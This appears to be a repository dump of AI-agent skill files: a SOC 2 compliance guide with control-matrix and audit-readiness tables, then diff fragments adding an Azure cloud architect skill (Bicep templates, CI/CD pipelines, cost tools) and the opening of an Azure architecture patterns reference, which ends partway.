SOC 2 is organized around five Trust Service Criteria (TSC) categories. **Security** is required for every SOC 2 report; the remaining four are optional and selected based on business need.
### Security (Common Criteria CC1-CC9) — Required
The foundation of every SOC 2 report. Maps to COSO 2013 principles.
| Criteria | Domain | Key Controls |
|----------|--------|-------------|
| **CC1** | Control Environment | Integrity/ethics, board oversight, org structure, competence, accountability |
| **CC2** | Communication & Information | Internal/external communication, information quality |
| **CC3** | Risk Assessment | Risk identification, fraud risk, change impact analysis |
| **CC4** | Monitoring Activities | Ongoing monitoring, deficiency evaluation, corrective actions |
| **CC5** | Control Activities | Policies/procedures, technology controls, deployment through policies |
| **CC6** | Logical & Physical Access | Access provisioning, authentication, encryption, physical restrictions |
| **CC7** | System Operations | Vulnerability management, anomaly detection, incident response |
| **CC8** | Change Management | Change authorization, testing, approval, emergency changes |
| **CC9** | Risk Mitigation | Vendor/business partner risk management |
### Availability (A1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **A1.1** | Capacity management | Infrastructure scaling, resource monitoring, capacity planning |
| **A1.2** | Recovery operations | Backup procedures, disaster recovery, BCP testing |
| **A1.3** | Recovery testing | DR drills, failover testing, RTO/RPO validation |
**Select when:** Customers depend on your uptime; you have SLAs; downtime causes direct business impact.
### Confidentiality (C1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **C1.1** | Identification | Data classification policy, confidential data inventory |
| **C1.2** | Protection | Encryption at rest and in transit, DLP, access restrictions |
| **C1.3** | Disposal | Secure deletion procedures, media sanitization, retention enforcement |
**Select when:** You handle trade secrets, proprietary data, or contractually confidential information.
### Processing Integrity (PI1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **PI1.1** | Accuracy | Input validation, processing checks, output verification |
| **PI1.2** | Completeness | Transaction monitoring, reconciliation, error handling |
| **PI1.3** | Timeliness | SLA monitoring, processing delay alerts, batch job monitoring |
| **PI1.4** | Authorization | Processing authorization controls, segregation of duties |
**Select when:** Data accuracy is critical (financial processing, healthcare records, analytics platforms).
### Privacy (P1-P8) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **P1** | Notice | Privacy policy, data collection notice, purpose limitation |
| **P2** | Choice & Consent | Opt-in/opt-out, consent management, preference tracking |
| **P3** | Collection | Minimal collection, lawful basis, purpose specification |
| **P4** | Use, Retention, Disposal | Purpose limitation, retention schedules, secure disposal |
| **P5** | Access | Data subject access requests, correction rights |
| **P6** | Disclosure & Notification | Third-party sharing, breach notification |
| **P7** | Quality | Data accuracy verification, correction mechanisms |
| **P8** | Monitoring & Enforcement | Privacy program monitoring, complaint handling |
**Select when:** You process PII and customers expect privacy assurance (complements GDPR compliance).
---
## Control Matrix Generation
A control matrix maps each TSC criterion to specific controls, owners, evidence, and testing procedures.
### Matrix Structure
| Field | Description |
|-------|-------------|
| **Control ID** | Unique identifier (e.g., SEC-001, AVL-003) |
| **TSC Mapping** | Which criteria the control addresses (e.g., CC6.1, A1.2) |
| **Control Description** | What the control does |
| **Control Type** | Preventive, Detective, or Corrective |
| **Owner** | Responsible person/team |
| **Frequency** | Continuous, Daily, Weekly, Monthly, Quarterly, Annual |
| **Evidence Type** | Screenshot, Log, Policy, Config, Ticket |
| **Testing Procedure** | How the auditor verifies the control |
### Control Naming Convention
```
{CATEGORY}-{NUMBER}
SEC-001 through SEC-NNN → Security
AVL-001 through AVL-NNN → Availability
CON-001 through CON-NNN → Confidentiality
PRI-001 through PRI-NNN → Processing Integrity
PRV-001 through PRV-NNN → Privacy
```
### Workflow
1. Select applicable TSC categories based on business needs
2. Run `control_matrix_builder.py` to generate the baseline matrix
3. Customize controls to match your actual environment
4. Assign owners and evidence requirements
5. Validate coverage — every selected TSC criterion must have at least one control
---
## Gap Analysis Workflow
### Phase 1: Current State Assessment
1. **Document existing controls** — inventory all security policies, procedures, and technical controls
2. **Map to TSC** — align existing controls to Trust Service Criteria
3. **Collect evidence samples** — gather proof that controls exist and operate
4. **Interview control owners** — verify understanding and execution
### Phase 2: Gap Identification
Run `gap_analyzer.py` against your current controls to identify:
- **Missing controls** — TSC criteria with no corresponding control
- **Partially implemented** — Control exists but lacks evidence or consistency
- **Design gaps** — Control designed but does not adequately address the criteria
- **Operating gaps** (Type II only) — Control designed correctly but not operating effectively
### Phase 3: Remediation Planning
For each gap, define:
| Field | Description |
|-------|-------------|
| Gap ID | Reference identifier |
| TSC Criteria | Affected criteria |
| Gap Description | What is missing or insufficient |
| Remediation Action | Specific steps to close the gap |
| Owner | Person responsible for remediation |
| Priority | Critical / High / Medium / Low |
| Target Date | Completion deadline |
| Dependencies | Other gaps or projects that must complete first |
### Phase 4: Timeline Planning
| Priority | Target Remediation |
|----------|--------------------|
| Critical | 2-4 weeks |
| High | 4-8 weeks |
| Medium | 8-12 weeks |
| Low | 12-16 weeks |
---
## Evidence Collection
### Evidence Types by Control Category
| Control Area | Primary Evidence | Secondary Evidence |
|--------------|-----------------|-------------------|
| Access Management | User access reviews, provisioning tickets | Role matrix, access logs |
| Change Management | Change tickets, approval records | Deployment logs, test results |
| Incident Response | Incident tickets, postmortems | Runbooks, escalation records |
| Vulnerability Management | Scan reports, patch records | Remediation timelines |
| Encryption | Configuration screenshots, certificate inventory | Key rotation logs |
| Backup & Recovery | Backup logs, DR test results | Recovery time measurements |
| Monitoring | Alert configurations, dashboard screenshots | On-call schedules, escalation records |
| Policy Management | Signed policies, version history | Training completion records |
| Vendor Management | Vendor assessments, SOC 2 reports | Contract reviews, risk registers |
### Automation Opportunities
| Area | Automation Approach |
|------|-------------------|
| Access reviews | Integrate IAM with ticketing (automatic quarterly review triggers) |
| Configuration evidence | Infrastructure-as-code snapshots, compliance-as-code tools |
| Vulnerability scans | Scheduled scanning with auto-generated reports |
| Change management | Git-based audit trail (commits, PRs, approvals) |
| Uptime monitoring | Automated SLA dashboards with historical data |
| Backup verification | Automated restore tests with success/failure logging |
### Continuous Monitoring
Move from point-in-time evidence collection to continuous compliance:
1. **Automated evidence gathering** — scripts that pull evidence on schedule
2. **Control dashboards** — real-time visibility into control status
3. **Alert-based monitoring** — notify when a control drifts out of compliance
4. **Evidence repository** — centralized, timestamped evidence storage
---
## Audit Readiness Checklist
### Pre-Audit Preparation (4-6 Weeks Before)
- [ ] All controls documented with descriptions, owners, and frequencies
- [ ] Evidence collected for the entire observation period (Type II)
- [ ] Control matrix reviewed and gaps remediated
- [ ] Policies signed and distributed within the last 12 months
- [ ] Access reviews completed at the required frequency (e.g., quarterly)
- [ ] Vulnerability scans current (no critical/high findings left unpatched beyond SLA)
- [ ] Incident response plan tested within the last 12 months
- [ ] Vendor risk assessments current for all subservice organizations
- [ ] DR/BCP tested and documented within the last 12 months
- [ ] Employee security training completed for all staff
### Readiness Scoring
| Score | Rating | Meaning |
|-------|--------|---------|
| 90-100% | Audit Ready | Proceed with confidence |
| 75-89% | Minor Gaps | Address before scheduling audit |
| 50-74% | Significant Gaps | Remediation required |
| < 50% | Not Ready | Major program build-out needed |
### Common Audit Findings
| Finding | Root Cause | Prevention |
|---------|-----------|-----------|
| Incomplete access reviews | Manual process, no reminders | Automate quarterly review triggers |
| Missing change approvals | Emergency changes bypass process | Define emergency change procedure with post-hoc approval |
| Stale vulnerability scans | Scanner misconfigured | Automated weekly scans with alerting |
| Policy not acknowledged | No tracking mechanism | Annual e-signature workflow |
| Missing vendor assessments | No vendor inventory | Maintain vendor register with review schedule |
---
## Vendor Management
### Third-Party Risk Assessment
Every vendor that accesses, stores, or processes customer data must be assessed:
1. **Vendor inventory** — maintain a register of all service providers
2. **Risk classification** — categorize vendors by data access level
3. **Due diligence** — collect SOC 2 reports, security questionnaires, certifications
4. **Contractual protections** — ensure DPAs, security requirements, breach notification clauses
5. **Ongoing monitoring** — annual reassessment, continuous news monitoring
### Vendor Risk Tiers
| Tier | Data Access | Assessment Frequency | Requirements |
|------|-------------|---------------------|-------------|
| Critical | Processes/stores customer data | Annual + continuous monitoring | SOC 2 Type II, penetration test, security review |
| High | Accesses customer environment | Annual | SOC 2 Type II or equivalent, questionnaire |
| Medium | Indirect access, support tools | Annual questionnaire | Security certifications, questionnaire |
| Low | No data access | Biennial questionnaire | Basic security questionnaire |
### Subservice Organizations
When your SOC 2 report relies on controls at a subservice organization (e.g., AWS, GCP, Azure):
- **Inclusive method** — your report covers the subservice org's controls (requires their cooperation)
- **Carve-out method** — your report excludes their controls but references their SOC 2 report
- Most companies use **carve-out** and include complementary user entity controls (CUECs)
---
## Continuous Compliance
### From Point-in-Time to Continuous
| Aspect | Point-in-Time | Continuous |
|--------|---------------|-----------|
| Evidence collection | Manual, before audit | Automated, ongoing |
| Control monitoring | Periodic review | Real-time dashboards |
| Drift detection | Found during audit | Alert-based, immediate |
| Remediation | Reactive | Proactive |
| Audit preparation | 4-8 week scramble | Always ready |
### Implementation Steps
1. **Automate evidence gathering** — cron jobs, API integrations, IaC snapshots
2. **Build control dashboards** — aggregate control status into a single view
3. **Configure drift alerts** — notify when controls fall out of compliance
4. **Establish review cadence** — weekly control owner check-ins, monthly steering
5. **Maintain evidence repository** — centralized, timestamped, auditor-accessible
### Annual Re-Assessment Cycle
| Quarter | Activities |
|---------|-----------|
| Q1 | Annual risk assessment, policy refresh, vendor reassessment launch |
| Q2 | Internal control testing, remediation of findings |
| Q3 | Pre-audit readiness review, evidence completeness check |
| Q4 | External audit, management assertion, report distribution |
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Better Approach |
|--------------|-------------|----------------|
| Point-in-time compliance | Controls degrade between audits; gaps found during audit | Implement continuous monitoring and automated evidence |
| Manual evidence collection | Time-consuming, inconsistent, error-prone | Automate with scripts, IaC, and compliance platforms |
| Missing vendor assessments | Auditors flag incomplete vendor due diligence | Maintain vendor register with risk-tiered assessment schedule |
| Copy-paste policies | Generic policies don't match actual operations | Tailor policies to your actual environment and technology stack |
| Security theater | Controls exist on paper but aren't followed | Verify operating effectiveness; build controls into workflows |
| Skipping Type I | Jumping to Type II without foundational readiness | Start with Type I to validate control design before observation |
| Over-scoping TSC | Including all 5 categories when only Security is needed | Select categories based on actual customer/business requirements |
| Treating audit as a project | Compliance degrades after the report is issued | Build compliance into daily operations and engineering culture |
---
## Tools
### Control Matrix Builder
Generates a SOC 2 control matrix from selected TSC categories.
```bash
# Generate full security matrix in markdown
python scripts/control_matrix_builder.py --categories security --format md
# Generate matrix for multiple categories as JSON
python scripts/control_matrix_builder.py --categories security,availability,confidentiality --format json
# All categories, CSV output
python scripts/control_matrix_builder.py --categories security,availability,confidentiality,processing-integrity,privacy --format csv
```
### Evidence Tracker
Tracks evidence collection status per control.
```bash
# Check evidence status from a control matrix
python scripts/evidence_tracker.py --matrix controls.json --status
# JSON output for integration
python scripts/evidence_tracker.py --matrix controls.json --status --json
```
### Gap Analyzer
Analyzes current controls against SOC 2 requirements and identifies gaps.
```bash
# Type I gap analysis
python scripts/gap_analyzer.py --controls current_controls.json --type type1
# Type II gap analysis (includes operating effectiveness)
python scripts/gap_analyzer.py --controls current_controls.json --type type2 --json
```
---
## References
- [Trust Service Criteria Reference](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/soc2-compliance/references/trust_service_criteria.md) — All 5 TSC categories with sub-criteria, control objectives, and evidence examples
- [Evidence Collection Guide](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/soc2-compliance/references/evidence_collection_guide.md) — Evidence types per control, automation tools, documentation requirements
- [Type I vs Type II Comparison](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/soc2-compliance/references/type1_vs_type2.md) — Detailed comparison, timeline, cost analysis, and upgrade path
---
## Cross-References
- **[gdpr-dsgvo-expert](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/gdpr-dsgvo-expert/SKILL.md)** — SOC 2 Privacy criteria overlaps significantly with GDPR requirements; use together when processing EU personal data
- **[information-security-manager-iso27001](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/information-security-manager-iso27001/SKILL.md)** — ISO 27001 Annex A controls map closely to SOC 2 Security criteria; organizations pursuing both can share evidence
- **[isms-audit-expert](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/isms-audit-expert/SKILL.md)** — Audit methodology and finding management patterns transfer directly to SOC 2 audit preparation

View File

@@ -1,6 +1,6 @@
{
"name": "engineering-skills",
"description": "26 production-ready engineering skills: architecture, frontend, backend, fullstack, QA, DevOps, security, AI/ML, data engineering, Playwright (9 sub-skills), self-improving agent, Stripe integration, TDD guide, Google Workspace CLI, a11y audit (WCAG 2.2), and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
"description": "28 production-ready engineering skills: architecture, frontend, backend, fullstack, QA, DevOps, security, AI/ML, data engineering, Playwright (9 sub-skills), self-improving agent, Stripe integration, TDD guide, Google Workspace CLI, a11y audit (WCAG 2.2), Azure cloud architect, security pen testing, and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
"version": "2.1.2",
"author": {
"name": "Alireza Rezvani",

View File

@@ -0,0 +1,463 @@
---
name: "azure-cloud-architect"
description: "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure costs, set up Azure DevOps pipelines, or migrate to Azure. Covers AKS, App Service, Azure Functions, Cosmos DB, and cost optimization."
---
# Azure Cloud Architect
Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code templates.
---
## Workflow
### Step 1: Gather Requirements
Collect application specifications:
```
- Application type (web app, mobile backend, data pipeline, SaaS, microservices)
- Expected users and requests per second
- Budget constraints (monthly spend limit)
- Team size and Azure experience level
- Compliance requirements (GDPR, HIPAA, SOC 2, ISO 27001)
- Availability requirements (SLA, RPO/RTO)
- Region preferences (data residency, latency)
```
### Step 2: Design Architecture
Run the architecture designer to get pattern recommendations:
```bash
python scripts/architecture_designer.py \
--app-type web_app \
--users 10000 \
--requirements '{"budget_monthly_usd": 500, "compliance": ["SOC2"]}'
```
**Example output:**
```json
{
"recommended_pattern": "app_service_web",
"service_stack": ["App Service", "Azure SQL", "Front Door", "Key Vault", "Entra ID"],
"estimated_monthly_cost_usd": 280,
"pros": ["Managed platform", "Built-in autoscale", "Deployment slots"],
"cons": ["Less control than VMs", "Platform constraints", "Cold start on consumption plans"]
}
```
Select from recommended patterns:
- **App Service Web**: Front Door + App Service + Azure SQL + Redis Cache
- **Microservices on AKS**: AKS + Service Bus + Cosmos DB + API Management
- **Serverless Event-Driven**: Functions + Event Grid + Service Bus + Cosmos DB
- **Data Pipeline**: Data Factory + Synapse Analytics + Data Lake Storage + Event Hubs
See `references/architecture_patterns.md` for detailed pattern specifications.
**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
### Step 3: Generate IaC Templates
Create infrastructure-as-code for the selected pattern:
```bash
# Web app stack (Bicep)
python scripts/bicep_generator.py --arch-type web-app --output main.bicep
```
**Example Bicep output (core web app resources):**
```bicep
@description('The environment name')
param environment string = 'dev'
@description('The Azure region for resources')
param location string = resourceGroup().location
@description('The application name')
param appName string = 'myapp'
// App Service Plan
resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
name: '${environment}-${appName}-plan'
location: location
sku: {
name: 'P1v3'
tier: 'PremiumV3'
capacity: 1
}
properties: {
reserved: true // Linux
}
}
// App Service
resource appService 'Microsoft.Web/sites@2023-01-01' = {
name: '${environment}-${appName}-web'
location: location
properties: {
serverFarmId: appServicePlan.id
httpsOnly: true
siteConfig: {
linuxFxVersion: 'NODE|20-lts'
minTlsVersion: '1.2'
ftpsState: 'Disabled'
alwaysOn: true
}
}
identity: {
type: 'SystemAssigned'
}
}
// Azure SQL Database
resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
name: '${environment}-${appName}-sql'
location: location
properties: {
administrators: {
azureADOnlyAuthentication: true
}
minimalTlsVersion: '1.2'
}
}
resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
parent: sqlServer
name: '${appName}-db'
location: location
sku: {
name: 'GP_S_Gen5_2'
tier: 'GeneralPurpose'
}
properties: {
autoPauseDelay: 60
minCapacity: json('0.5')
}
}
```
> Full templates including Front Door, Key Vault, Managed Identity, and monitoring are generated by `bicep_generator.py` and also available in `references/architecture_patterns.md`.
**Bicep is the recommended IaC language for Azure.** Prefer Bicep over ARM JSON templates: Bicep compiles to ARM JSON, has cleaner syntax, supports modules, and is first-party supported by Microsoft.
### Step 4: Review Costs
Analyze estimated costs and optimization opportunities:
```bash
python scripts/cost_optimizer.py \
--config current_resources.json \
--json
```
**Example output:**
```json
{
"current_monthly_usd": 2000,
"recommendations": [
{ "action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high" },
{ "action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high" },
{ "action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium" }
],
"total_potential_savings_usd": 735
}
```
Output includes:
- Monthly cost breakdown by service
- Right-sizing recommendations
- Reserved Instance and Savings Plan opportunities
- Potential monthly savings
### Step 5: Configure CI/CD
Set up Azure DevOps Pipelines or GitHub Actions with Azure:
```yaml
# GitHub Actions — deploy Bicep to Azure
name: Deploy Infrastructure
on:
push:
branches: [main]
permissions:
id-token: write
contents: read
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: azure/login@v2
with:
client-id: ${{ secrets.AZURE_CLIENT_ID }}
tenant-id: ${{ secrets.AZURE_TENANT_ID }}
subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
- uses: azure/arm-deploy@v2
with:
resourceGroupName: rg-myapp-dev
template: ./infra/main.bicep
parameters: environment=dev
```
```yaml
# Azure DevOps Pipeline
trigger:
branches:
include:
- main
pool:
vmImage: 'ubuntu-latest'
steps:
- task: AzureCLI@2
inputs:
azureSubscription: 'MyServiceConnection'
scriptType: 'bash'
scriptLocation: 'inlineScript'
inlineScript: |
az deployment group create \
--resource-group rg-myapp-dev \
--template-file infra/main.bicep \
--parameters environment=dev
```
### Step 6: Security Review
Validate security posture before production:
- **Identity**: Entra ID (Azure AD) with RBAC, Managed Identity for service-to-service auth — never store credentials in code
- **Secrets**: Key Vault for all secrets, certificates, and connection strings
- **Network**: NSGs on all subnets, Private Endpoints for PaaS services, Application Gateway with WAF
- **Encryption**: TLS 1.2+ in transit, Azure-managed or customer-managed keys at rest
- **Monitoring**: Microsoft Defender for Cloud enabled, Azure Policy for guardrails
- **Compliance**: Azure Policy assignments for SOC 2 / HIPAA / ISO 27001 initiatives
**If deployment fails:**
1. Check the deployment status:
```bash
az deployment group show \
--resource-group rg-myapp-dev \
--name main \
--query 'properties.error'
```
2. Review Activity Log for RBAC or policy errors.
3. Validate the Bicep template before deploying:
```bash
az bicep build --file main.bicep
az deployment group validate \
--resource-group rg-myapp-dev \
--template-file main.bicep
```
**Common failure causes:**
- RBAC permission errors — verify the deploying principal has Contributor on the resource group
- Resource provider not registered — run `az provider register --namespace Microsoft.Web`
- Naming conflicts — Azure resource names are often globally unique (storage accounts, web apps)
- Quota exceeded — request quota increase via Azure Portal > Subscriptions > Usage + quotas
---
## Tools
### architecture_designer.py
Generates architecture pattern recommendations based on requirements.
```bash
python scripts/architecture_designer.py \
--app-type web_app \
--users 50000 \
--requirements '{"budget_monthly_usd": 1000, "compliance": ["HIPAA"]}' \
--json
```
**Input:** Application type, expected users, JSON requirements
**Output:** Recommended pattern, service stack, cost estimate, pros/cons
### cost_optimizer.py
Analyzes Azure resource configurations for cost savings.
```bash
python scripts/cost_optimizer.py --config resources.json --json
```
**Input:** JSON file with current Azure resource inventory
**Output:** Recommendations for:
- Idle resource removal
- VM and database right-sizing
- Reserved Instance purchases
- Storage tier transitions
- Unused public IPs and load balancers
### bicep_generator.py
Generates Bicep template scaffolds from architecture type.
```bash
python scripts/bicep_generator.py --arch-type microservices --output main.bicep
```
**Output:** Production-ready Bicep templates with:
- Managed Identity (no passwords)
- Key Vault integration
- Diagnostic settings for Azure Monitor
- Network security groups
- Tags for cost allocation
---
## Quick Start
### Web App Architecture (< $100/month)
```
Ask: "Design an Azure web app for a startup with 5000 users"
Result:
- App Service (B1 Linux) for the application
- Azure SQL Serverless for relational data
- Azure Blob Storage for static assets
- Front Door (free tier) for CDN and routing
- Key Vault for secrets
- Estimated: $40-80/month
```
### Microservices on AKS ($500-2000/month)
```
Ask: "Design a microservices architecture on Azure for a SaaS platform with 50k users"
Result:
- AKS cluster with 3 node pools (system, app, jobs)
- API Management for gateway and rate limiting
- Cosmos DB for multi-model data
- Service Bus for async messaging
- Azure Monitor + Application Insights for observability
- Multi-zone deployment
```
### Serverless Event-Driven (< $200/month)
```
Ask: "Design an event-driven backend for processing orders"
Result:
- Azure Functions (Consumption plan) for compute
- Event Grid for event routing
- Service Bus for reliable messaging
- Cosmos DB for order data
- Application Insights for monitoring
- Estimated: $30-150/month depending on volume
```
### Data Pipeline ($300-1500/month)
```
Ask: "Design a data pipeline for ingesting 10M events/day"
Result:
- Event Hubs for ingestion
- Stream Analytics or Functions for processing
- Data Lake Storage Gen2 for raw data
- Synapse Analytics for warehouse
- Power BI for dashboards
```
---
## Input Requirements
Provide these details for architecture design:
| Requirement | Description | Example |
|-------------|-------------|---------|
| Application type | What you're building | SaaS platform, mobile backend |
| Expected scale | Users, requests/sec | 10k users, 100 RPS |
| Budget | Monthly Azure limit | $500/month max |
| Team context | Size, Azure experience | 3 devs, intermediate |
| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |
**JSON Format:**
```json
{
"application_type": "saas_platform",
"expected_users": 10000,
"requests_per_second": 100,
"budget_monthly_usd": 500,
"team_size": 3,
"azure_experience": "intermediate",
"compliance": ["SOC2"],
"availability_sla": "99.9%"
}
```
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Do This Instead |
|---|---|---|
| ARM JSON templates for new projects | Verbose, hard to read, no modules | Use Bicep — compiles to ARM, cleaner syntax |
| Storing secrets in App Settings | Secrets visible in portal, no rotation | Use Key Vault references in App Settings |
| Single large AKS node pool | Cannot optimize for different workloads | Use multiple node pools: system, app, jobs |
| Public endpoints on PaaS services | Exposed attack surface | Use Private Endpoints + VNet integration |
| Over-provisioning "just in case" | Wastes budget month one | Start small, use autoscale, right-size monthly |
| Shared resource groups for everything | Blast radius, RBAC nightmares | One resource group per environment per workload |
| No tagging strategy | Cannot track costs or ownership | Tag: environment, owner, cost-center, app-name |
| Using classic resources | Deprecated, limited features | Use ARM/Bicep resources exclusively |
---
## Output Formats
### Architecture Design
- Pattern recommendation with rationale
- Service stack diagram (ASCII)
- Monthly cost estimate and trade-offs
### IaC Templates
- **Bicep**: Recommended — first-party, module support, clean syntax
- **ARM JSON**: Generated from Bicep when needed
- **Terraform HCL**: Multi-cloud compatible using azurerm provider
### Cost Analysis
- Current spend breakdown with optimization recommendations
- Priority action list (high/medium/low) and implementation checklist
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| `engineering-team/aws-solution-architect` | AWS equivalent — same 6-step workflow, different services |
| `engineering-team/gcp-cloud-architect` | GCP equivalent — completes the cloud trifecta |
| `engineering-team/senior-devops` | Broader DevOps scope — pipelines, monitoring, containerization |
| `engineering/terraform-patterns` | IaC implementation — use for Terraform modules targeting Azure |
| `engineering/ci-cd-pipeline-builder` | Pipeline construction — automates Azure DevOps and GitHub Actions |
---
## Reference Documentation
| Document | Contents |
|----------|----------|
| `references/architecture_patterns.md` | 5 patterns: web app, microservices/AKS, serverless, data pipeline, multi-region |
| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging, networking |
| `references/best_practices.md` | Naming conventions, tagging, RBAC, network security, monitoring, DR |

View File

@@ -0,0 +1,413 @@
# Azure Architecture Patterns
Reference guide for selecting the right Azure architecture pattern based on application requirements.
---
## Table of Contents
- [Pattern Selection Matrix](#pattern-selection-matrix)
- [Pattern 1: App Service Web Application](#pattern-1-app-service-web-application)
- [Pattern 2: Microservices on AKS](#pattern-2-microservices-on-aks)
- [Pattern 3: Serverless Event-Driven](#pattern-3-serverless-event-driven)
- [Pattern 4: Data Pipeline](#pattern-4-data-pipeline)
- [Pattern 5: Multi-Region Active-Active](#pattern-5-multi-region-active-active)
- [Well-Architected Framework Alignment](#well-architected-framework-alignment)
---
## Pattern Selection Matrix
| Pattern | Best For | Users | Monthly Cost | Complexity |
|---------|----------|-------|--------------|------------|
| App Service Web | MVPs, SaaS, APIs | <100K | $50-500 | Low |
| Microservices on AKS | Complex platforms, multi-team | Any | $500-5000 | High |
| Serverless Event-Driven | Event processing, webhooks, APIs | <1M | $20-500 | Low-Medium |
| Data Pipeline | Analytics, ETL, ML | Any | $200-3000 | Medium-High |
| Multi-Region Active-Active | Global apps, 99.99% uptime | >100K | 1.5-2x single-region | High |
---
## Pattern 1: App Service Web Application
### Architecture
```
┌──────────────┐
│ Azure Front │
│ Door │
│ (CDN + WAF) │
└──────┬───────┘
┌──────▼───────┐
│ App Service │
│ (Linux P1v3)│
│ + Slots │
└──┬───────┬───┘
│ │
┌────────▼──┐ ┌──▼────────┐
│ Azure SQL │ │ Blob │
│ Serverless │ │ Storage │
└────────────┘ └───────────┘
┌────────▼──────────┐
│ Key Vault │
│ (secrets, certs) │
└───────────────────┘
```
### Services
| Service | Purpose | Configuration |
|---------|---------|---------------|
| Azure Front Door | Global CDN, WAF, SSL | Standard or Premium tier, custom domain |
| App Service | Web application hosting | Linux P1v3 (production), B1 (dev) |
| Azure SQL Database | Relational database | Serverless GP_S_Gen5_2 with auto-pause |
| Blob Storage | Static assets, uploads | Hot tier with lifecycle policies |
| Key Vault | Secrets management | RBAC authorization, soft-delete enabled |
| Application Insights | Monitoring and APM | Workspace-based, connected to Log Analytics |
| Entra ID | Authentication | Easy Auth or MSAL library |
### Deployment Strategy
- **Deployment slots**: staging slot for zero-downtime deploys, swap to production after validation
- **Auto-scale**: CPU-based rules, 1-10 instances in production
- **Health checks**: `/health` endpoint monitored by App Service and Front Door
### Cost Estimate
| Component | Dev | Production |
|-----------|-----|-----------|
| App Service | $13 (B1) | $75 (P1v3) |
| Azure SQL | $5 (Basic) | $40-120 (Serverless GP) |
| Front Door | $0 (disabled) | $35-55 |
| Blob Storage | $1 | $5-15 |
| Key Vault | $0.03 | $1-5 |
| Application Insights | $0 (free tier) | $5-20 |
| **Total** | **~$19** | **~$160-290** |
---
## Pattern 2: Microservices on AKS
### Architecture
```
┌──────────────┐
│ Azure Front │
│ Door │
└──────┬───────┘
┌──────▼───────┐
│ API Mgmt │
│ (gateway) │
└──────┬───────┘
┌────────────▼────────────┐
│ AKS Cluster │
│ ┌───────┐ ┌───────┐ │
│ │ svc-A │ │ svc-B │ │
│ └───┬───┘ └───┬───┘ │
│ │ │ │
│ ┌───▼─────────▼───┐ │
│ │ Service Bus │ │
│ │ (async msgs) │ │
│ └─────────────────┘ │
└─────────────────────────┘
│ │
┌────────▼──┐ ┌──▼────────┐
│ Cosmos DB │ │ ACR │
│ (data) │ │ (images) │
└────────────┘ └───────────┘
```
### Services
| Service | Purpose | Configuration |
|---------|---------|---------------|
| AKS | Container orchestration | 3 node pools: system (D2s_v5), app (D4s_v5), jobs (spot) |
| API Management | API gateway, rate limiting | Standard v2 or Consumption tier |
| Cosmos DB | Multi-model database | Session consistency, autoscale RU/s |
| Service Bus | Async messaging | Standard tier, topics for pub/sub |
| Container Registry | Docker image storage | Basic (dev), Standard (prod) |
| Key Vault | Secrets for pods | CSI driver + workload identity |
| Azure Monitor | Cluster and app observability | Container Insights + App Insights |
### AKS Best Practices
**Node Pools:**
- System pool: 2-3 nodes, D2s_v5, taints for system pods only
- App pool: 2-10 nodes (autoscaler), D4s_v5, for application workloads
- Jobs pool: spot instances, for batch processing and CI runners
**Networking:**
- Azure CNI for VNet-native pod networking
- Network policies (Azure or Calico) for pod-to-pod isolation
- Ingress via NGINX Ingress Controller or Application Gateway Ingress Controller (AGIC)
**Security:**
- Workload Identity for pod-to-Azure service auth (replaces pod identity)
- Azure Policy for Kubernetes (OPA Gatekeeper)
- Defender for Containers for runtime threat detection
- Private cluster for production (API server not exposed to internet)
**Deployment:**
- Helm charts for application packaging
- Flux or ArgoCD for GitOps
- Horizontal Pod Autoscaler (HPA) + KEDA for event-driven scaling
### Cost Estimate
| Component | Dev | Production |
|-----------|-----|-----------|
| AKS nodes (system) | $60 (1x D2s_v5) | $180 (3x D2s_v5) |
| AKS nodes (app) | $120 (1x D4s_v5) | $360 (3x D4s_v5) |
| API Management | $0 (Consumption) | $175 (Standard v2) |
| Cosmos DB | $25 (serverless) | $100-400 (autoscale) |
| Service Bus | $10 | $10-50 |
| Container Registry | $5 | $20 |
| Monitoring | $0 | $50-100 |
| **Total** | **~$220** | **~$900-1300** |
---
## Pattern 3: Serverless Event-Driven
### Architecture
```
┌──────────┐ ┌──────────┐ ┌──────────┐
│ HTTP │ │ Blob │ │ Timer │
│ Trigger │ │ Trigger │ │ Trigger │
└────┬─────┘ └────┬─────┘ └────┬─────┘
│ │ │
└────────┬───────┴─────────┬───────┘
│ │
┌──────▼───────┐ ┌──────▼───────┐
│ Azure │ │ Azure │
│ Functions │ │ Functions │
│ (handlers) │ │ (workers) │
└──┬────┬──────┘ └──────┬───────┘
│ │ │
┌─────────▼┐ ┌─▼──────────┐ ┌─▼──────────┐
│ Event │ │ Service │ │ Cosmos DB │
│ Grid │ │ Bus Queue │ │ (data) │
│ (fanout) │ │ (reliable) │ │ │
└──────────┘ └────────────┘ └────────────┘
```
### Services
